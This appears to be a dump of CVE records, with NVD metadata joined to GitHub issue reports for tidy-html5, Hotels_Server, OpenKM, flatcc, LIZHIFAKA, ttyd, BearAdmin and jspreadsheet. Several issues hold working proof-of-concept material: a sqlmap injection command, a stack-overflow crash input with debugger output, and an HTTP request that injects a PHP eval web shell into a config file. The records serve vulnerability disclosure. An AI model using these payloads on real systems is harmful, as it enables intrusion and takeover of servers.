==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4c46d08 is 8 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid write of size 8
==1752197== at 0x41D55D: DiscardContainer (src/gdoc.c:78)
==1752197== by 0x41D303: CleanNode (src/gdoc.c:114)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4c432a0 is 16 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
line 1 column 56 - Warning: <br> proprietary attribute "html"
line 1 column 74 - Warning: <html> proprietary attribute "itemscope"
line 1 column 74 - Warning: <html> proprietary attribute "itemtype"
line 1 column 74 - Warning: <html> proprietary attribute "lang"
line 1 column 148 - Warning: <meta> proprietary attribute "content"
line 1 column 148 - Warning: <meta> proprietary attribute "http-equiv"
line 1 column 216 - Warning: <meta> proprietary attribute "content"
line 1 column 216 - Warning: <meta> proprietary attribute "style"
line 1 column 364 - Warning: <table> proprietary attribute "cellpadding"
line 1 column 364 - Warning: <table> proprietary attribute "cellspacing"
line 1 column 432 - Warning: <td> proprietary attribute "width"
line 1 column 536 - Warning: <input> proprietary attribute "value"
line 1 column 536 - Warning: <input> proprietary attribute "name"
line 1 column 536 - Warning: <input> proprietary attribute "type"
line 1 column 581 - Warning: <input> proprietary attribute "name"
line 1 column 581 - Warning: <input> proprietary attribute "tg"
line 1 column 581 - Warning: <input> proprietary attribute "ype"
line 1 column 581 - Warning: <input> proprietary attribute "value"
line 2 column 25 - Warning: <input> proprietary attribute "name"
line 2 column 25 - Warning: <input> proprietary attribute "type"
line 2 column 275 - Warning: <script> proprietary attribute "nonce"
line 2 column 1515 - Warning: <meta> proprietary attribute "itemprop"
line 4 column 619 - Warning: <area> proprietary attribute "google.y"
line 4 column 619 - Warning: <area> proprietary attribute "c"
Info: Document content looks like HTML5
Tidy found 155 warnings and 0 errors!
Character codes for UTF-8 must be in the range: U+0000 to U+10FFFF.
The definition of UTF-8 in Annex D of ISO/IEC 10646-1:2000 also
allows for the use of five- and six-byte sequences to encode
characters that are outside the range of the Unicode character set;
those five- and six-byte sequences are illegal for the use of
UTF-8 as a transformation of Unicode characters. ISO/IEC 10646
does not allow mapping of unpaired surrogates, nor U+FFFE and U+FFFF
(but it does allow other noncharacters). For more information please refer to
http://www.unicode.org/ and http://www.cl.cam.ac.uk/~mgk25/unicode.html
The alt attribute should be used to give a short description
of an image; longer descriptions should be given with the
longdesc attribute which takes a URL linked to the description.
These measures are needed for people using non-graphical browsers.
For hypertext links defined using a client-side image map, you
need to use the alt attribute to provide a textual description
of the link for people using non-graphical browsers.
For further advice on how to make your pages accessible
see http://www.w3.org/WAI/GL.
One or more empty elements were present in the source document but
dropped on output. If these elements are necessary or you don't want
this behavior, then consider setting the option "drop-empty-elements"
to no.
About HTML Tidy: https://github.com/htacg/tidy-html5
Bug reports and comments: https://github.com/htacg/tidy-html5/issues
Official mailing list: https://lists.w3.org/Archives/Public/public-htacg/
Latest HTML specification: http://dev.w3.org/html5/spec-author-view/
Validate your HTML documents: http://validator.w3.org/nu/
Lobby your company to join the W3C: http://www.w3.org/Consortium
Do you speak a language other than English, or a different variant of
English? Consider helping us to localize HTML Tidy. For details please see
https://github.com/htacg/tidy-html5/blob/master/README/LOCALIZE.md
==1752197==
==1752197== HEAP SUMMARY:
==1752197== in use at exit: 0 bytes in 0 blocks
==1752197== total heap usage: 2,385 allocs, 2,393 frees, 2,510,977 bytes allocated
==1752197==
==1752197== All heap blocks were freed -- no leaks are possible
==1752197==
==1752197== For lists of detected and suppressed errors, rerun with: -s
==1752197== ERROR SUMMARY: 921 errors from 79 contexts (suppressed: 0 from 0)
``` | Heap use-after-free in the CleanNode() function | https://api.github.com/repos/htacg/tidy-html5/issues/946/comments | 2 | 2021-05-05T17:06:33Z | 2021-07-31T12:32:49Z | https://github.com/htacg/tidy-html5/issues/946 | 876,663,313 | 946 | 4,740 |
CVE-2021-33948 | 2023-02-17T18:15:11.293 | SQL injection vulnerability in FantasticLBP Hotels Server v1.0 allows attacker to execute arbitrary code via the username parameter. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/FantasticLBP/Hotels_Server/issues/14"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/FantasticLBP/Hotels_Server/issues/14"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:hotels_server_project:hotels_server:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "CC3FA6F3-949D-44C2-B84F-41EA6876A4BC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/FantasticLBP/Hotels_Server/issues/14 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"FantasticLBP",
"Hotels_Server"
] | In /controller/fetchpwd.php
It will receive a parameter called "username" to search for existed users.
But in fact,this parameter just become a part of the SQL request without any process,so it will be possible to have a SQL injection.
We can use SQLMAP to test this vulnerability:
sqlmap -u "http://192.168.31.91/controller/fetchpwd.php" --data "username=1" --dbms mysql -p username


| During 2021-05-20, Hotels_Server can perform SQL injection through the username parameter. | https://api.github.com/repos/FantasticLBP/Hotels_Server/issues/14/comments | 0 | 2021-05-20T14:05:58Z | 2021-05-20T14:05:58Z | https://github.com/FantasticLBP/Hotels_Server/issues/14 | 896,881,182 | 14 | 4,741 |
CVE-2021-33950 | 2023-02-17T18:15:11.403 | An issue discovered in OpenKM v6.3.10 allows attackers to obtain sensitive information via the XMLTextExtractor function. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Patch"
],
"url": "https://github.com/openkm/document-management-system/commit/ce1d82329615aea6aa9f2cc6508c1fe7891e34b5"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/openkm/document-management-system/issues/287"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch"
],
"url": "https://github.com/openkm/document-management-system/pull/288"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/openkm/document-management-system/commit/ce1d82329615aea6aa9f2cc6508c1fe7891e34b5"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/openkm/document-management-system/issues/287"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/openkm/document-management-system/pull/288"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openkm:openkm:6.3.10:*:*:*:community:*:*:*",
"matchCriteriaId": "3A369378-79A5-4C69-9ED8-7880B4687FA2",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"611"
] | 611 | https://github.com/openkm/document-management-system/issues/287 | [
"Issue Tracking"
] | github.com | [
"openkm",
"document-management-system"
] | XXE injection security vulnerability | https://api.github.com/repos/openkm/document-management-system/issues/287/comments | 0 | 2021-05-20T06:39:32Z | 2021-05-20T06:40:43Z | https://github.com/openkm/document-management-system/issues/287 | 896,349,074 | 287 | 4,742 | |
CVE-2021-33983 | 2023-02-17T18:15:11.457 | Buffer Overflow vulnerability in Dvidelabs flatcc v.0.6.0 allows local attacker to execute arbitrary code via the fltacc execution of the error_ref_sym function. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/dvidelabs/flatcc/issues/188"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/dvidelabs/flatcc/issues/188"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:flatcc_project:flatcc:0.6.0:*:*:*:*:*:*:*",
"matchCriteriaId": "D20D58C3-DA9D-4A20-B777-1CFFC4F4C5B5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"120"
] | 120 | https://github.com/dvidelabs/flatcc/issues/188 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"dvidelabs",
"flatcc"
] | in parser.c
k seems like the size of the rest of buffer on stack(var 'buf' which type is char[]).
n is memcpy size as 3rd para.
`while` condition k>0 to keep buffer is not full.
if enter in `if(k<n)` branch `n=k`,var n is assigned the value of k
then `k -=n` ,var k is assigned the value 0
then `--k`, var k is assigned the value 0xffffffffffffffff while var k's type is size_t.
so the while condition`k > 0` not make sense.
next memcpy will lead to stack overflow
```c
void error_ref_sym(fb_parser_t *P, fb_ref_t *ref, const char *msg, fb_symbol_t *s2)
{
fb_ref_t *p;
char buf[FLATCC_MAX_IDENT_SHOW + 1];
size_t k = FLATCC_MAX_IDENT_SHOW;
size_t n = 0;
size_t n0 = 0;
p = ref;
while (p && k > 0) {
n = (size_t)p->ident->len;
if (k < n) {
n = k;
}
memcpy(buf + n0, p->ident->text, n);
k -= n;
n0 += n;
buf[n0] = '.';
--k; //overflow here when k = 0
++n0;
p = p->link;
}
buf[n0] = '\0';
if (n0 > 0) {
--n0;
}
if (k <= 0) {
memcpy(buf + FLATCC_MAX_IDENT_SHOW + 1 - 4, "...\0", 4);
n0 = FLATCC_MAX_IDENT_SHOW;
}
error_report(P, ref->ident, msg, s2 ? s2->ident : 0, buf, n0);
}
```
poc:
```
➜ fuzz_test cat test9
struct tsj{
damage:shortllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllve.tlllllllllllllllllllllllllllllllllllllll;
}
➜ fuzz_test ../flatcc/bin/flatcc test9
test9:2:9: error: 'shortlllllllllllllllllllllllllllllllllllllllllllll.tlllllllllllllllllllllllllllllllllllllll': unknown type reference used with struct field: test9:2:2: 'damage'
*** stack smashing detected ***: terminated
[1] 3685 abort (core dumped) ../flatcc/bin/flatcc test9
➜ fuzz_test
```
```
➜ fuzz_test gdb ../flatcc/bin/flatcc
GNU gdb (Ubuntu 9.2-0ubuntu1~20.04) 9.2
Copyright (C) 2020 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
pwndbg: loaded 196 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)
Reading symbols from ../flatcc/bin/flatcc...
pwndbg> set args test9
pwndbg> r
Starting program: /mnt/c/Users/tsj/Desktop/flatcc/bin/flatcc test9
test9:2:9: error: 'shortlllllllllllllllllllllllllllllllllllllllllllll.tlllllllllllllllllllllllllllllllllllllll': unknown type reference used with struct field: test9:2:2: 'damage'
*** stack smashing detected ***: terminated
Program received signal SIGABRT, Aborted.
__GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
50 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
─────────────────────────────────────────────────────────────────────────────────[ REGISTERS ]──────────────────────────────────────────────────────────────────────────────────
RAX 0x0
RBX 0x7fffff7e13c0 ◂— 0x7fffff7e13c0
RCX 0x8
RDX 0x0
RDI 0x2
RSI 0x7ffffffed990 ◂— 0x0
R8 0x0
R9 0x7ffffffed990 ◂— 0x0
R10 0x8
R11 0x8
R12 0x7ffffffedc10 ◂— 0x642ccf000a276567 /* "ge'\n" */
R13 0x20
R14 0x7fffff510000 ◂— 0x202a2a2a00001000
R15 0x1
RBP 0x7ffffffedd10 —▸ 0x7fffff76a07c ◂— '*** %s ***: terminated\n'
RSP 0x7ffffffed990 ◂— 0x0
RIP 0x7fffff5f618b (raise+203) ◂— mov rax, qword ptr [rsp + 0x108]
───────────────────────────────────────────────────────────────────────────────────[ DISASM ]───────────────────────────────────────────────────────────────────────────────────
► 0x7fffff5f618b <raise+203> mov rax, qword ptr [rsp + 0x108]
0x7fffff5f6193 <raise+211> xor rax, qword ptr fs:[0x28]
0x7fffff5f619c <raise+220> jne raise+260 <raise+260>
↓
0x7fffff5f61c4 <raise+260> call __stack_chk_fail <__stack_chk_fail>
0x7fffff5f61c9 nop dword ptr [rax]
0x7fffff5f61d0 <killpg> endbr64
0x7fffff5f61d4 <killpg+4> test edi, edi
0x7fffff5f61d6 <killpg+6> js killpg+16 <killpg+16>
0x7fffff5f61d8 <killpg+8> neg edi
0x7fffff5f61da <killpg+10> jmp kill <kill>
0x7fffff5f61df <killpg+15> nop
───────────────────────────────────────────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────────────────────────────────────────
00:0000│ rsi r9 rsp 0x7ffffffed990 ◂— 0x0
01:0008│ 0x7ffffffed998 —▸ 0x7ffffffedb48 ◂— 0x3000000030 /* '0' */
02:0010│ 0x7ffffffed9a0 —▸ 0x7ffffffedb60 ◂— "test9:2:9: error: 'shortlllllllllllllllllllllllllllllllllllllllllllll.tlllllllllllllllllllllllllllllllll"
03:0018│ 0x7ffffffed9a8 —▸ 0x7fffff63f11a (__vsnprintf_internal+170) ◂— mov r9, qword ptr [rsp + 8]
04:0020│ 0x7ffffffed9b0 ◂— 0x3
05:0028│ 0x7ffffffed9b8 —▸ 0x7ffffffedab0 ◂— 0x20 /* ' ' */
06:0030│ 0x7ffffffed9c0 ◂— 0xfbad8001
07:0038│ 0x7ffffffed9c8 —▸ 0x7ffffffedb60 ◂— "test9:2:9: error: 'shortlllllllllllllllllllllllllllllllllllllllllllll.tlllllllllllllllllllllllllllllllll"
─────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────────────────────────────────────────
► f 0 0x7fffff5f618b raise+203
f 1 0x7fffff5d5859 abort+299
f 2 0x7fffff6403ee __libc_message+670
f 3 0x7fffff6e2b4a __fortify_fail+42
f 4 0x7fffff6e2b16
f 5 0x8073af9
f 6 0x80976b9 __flatcc_fb_build_schema+21961
f 7 0x80976b9 __flatcc_fb_build_schema+21961
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg>
``` | found a integer overflow leads to stack_overflow | https://api.github.com/repos/dvidelabs/flatcc/issues/188/comments | 9 | 2021-05-22T20:54:13Z | 2021-05-22T21:50:14Z | https://github.com/dvidelabs/flatcc/issues/188 | 898,880,352 | 188 | 4,743 |
CVE-2021-34164 | 2023-02-17T18:15:11.513 | Permissions vulnerability in LIZHIFAKA v.2.2.0 allows authenticated attacker to execute arbitrary commands via the set password function in the admin/index/email location. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/lizhipay/faka/issues/22"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/lizhipay/faka/issues/22"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:lizhifaka_project:lizhifaka:2.2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "69BF6073-A626-4FD8-B9E2-68258472B227",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"276"
] | 276 | https://github.com/lizhipay/faka/issues/22 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"lizhipay",
"faka"
] | Sorry for my bad english
English:
/admin/index/email (Requires admin rights) The setting password option in this location can write arbitrary content to /config/email.php to obtain website permissions
Chinese:
/admin/index/email (需要管理员权限) 后台修改email密码处可以getshell获取网站权限
POC:
POST /admin/api/config/editEmail HTTP/1.1
Host: www.lizhi.top
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 49
Origin: http://www.lizhi.top
Connection: close
Referer: http://www.lizhi.top/admin/index/email
Cookie: PHPSESSID=jedhau3007vnla9hjdv228ugdi
smtp=smtp.163.com&port=994&user=admin&pass=admin','test'=>"${@eval($_POST['a'])};",'a'=>'


| An issue was discovered in LIZHIFAKA 2.2.0 | https://api.github.com/repos/lizhipay/faka/issues/22/comments | 0 | 2021-05-30T13:47:24Z | 2021-05-30T13:47:24Z | https://github.com/lizhipay/faka/issues/22 | 906,761,814 | 22 | 4,744 |
CVE-2021-34182 | 2023-02-17T18:15:11.567 | An issue in ttyd v.1.6.3 allows attacker to execute arbitrary code via default configuration permissions. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/tsl0922/ttyd/issues/692"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/tsl0922/ttyd/issues/692"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:ttyd_project:ttyd:1.6.3:*:*:*:*:*:*:*",
"matchCriteriaId": "FAB7EE76-8E3E-4520-A254-49FE75876FE4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"276"
] | 276 | https://github.com/tsl0922/ttyd/issues/692 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"tsl0922",
"ttyd"
] | By default, if the configuration permission is set, there will be unauthorized access, resulting in remote command execution | Unauthorized remote command execution | https://api.github.com/repos/tsl0922/ttyd/issues/692/comments | 2 | 2021-06-01T06:42:28Z | 2023-03-07T06:39:47Z | https://github.com/tsl0922/ttyd/issues/692 | 907,952,657 | 692 | 4,745 |
CVE-2021-35261 | 2023-02-17T18:15:11.620 | File Upload Vulnerability in Yupoxion BearAdmin before commit 10176153528b0a914eb4d726e200fd506b73b075 allows attacker to execute arbitrary remote code via the Upfile function of the extend/tools/Ueditor endpoint. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/yupoxiong/BearAdmin/issues/16"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/yupoxiong/BearAdmin/issues/16"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:bearadmin_project:bearadmin:-:*:*:*:*:*:*:*",
"matchCriteriaId": "E379A7E6-C68A-4260-914A-2D74B255A574",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/yupoxiong/BearAdmin/issues/16 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"yupoxiong",
"BearAdmin"
] | In application/admin/controller/EditorController.php, it handles editor file upload through server function

And then in extend/tools/UEditor.php function upFile,

it does not check the extension of the file then save it to local storage.
so when upload a file/image/vedio,we can upload a PHP file to getshell.

I test this vulnerability in your demo, and demonstrate it exist, please fix it as soon as possible.


| Unrestrict File Upload to RCE vulnerability Find in BearAdmin | https://api.github.com/repos/yupoxiong/BearAdmin/issues/16/comments | 2 | 2021-06-10T13:38:44Z | 2021-07-09T08:32:33Z | https://github.com/yupoxiong/BearAdmin/issues/16 | 917,358,585 | 16 | 4,746 |
CVE-2022-48115 | 2023-02-17T22:15:11.907 | The dropdown menu in jspreadsheet before v4.6.0 was discovered to be vulnerable to cross-site scripting (XSS). | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://github.com/jspreadsheet/ce"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/jspreadsheet/ce/issues/1587"
},
{
